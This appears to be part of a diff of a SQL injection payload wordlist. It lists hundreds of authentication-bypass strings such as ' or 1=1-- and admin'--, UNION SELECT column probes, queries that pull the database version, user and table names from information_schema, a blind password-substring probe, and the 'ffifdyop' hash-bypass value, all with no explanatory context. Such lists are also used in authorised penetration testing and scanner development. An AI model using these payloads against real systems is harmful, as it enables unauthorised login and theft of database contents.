')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
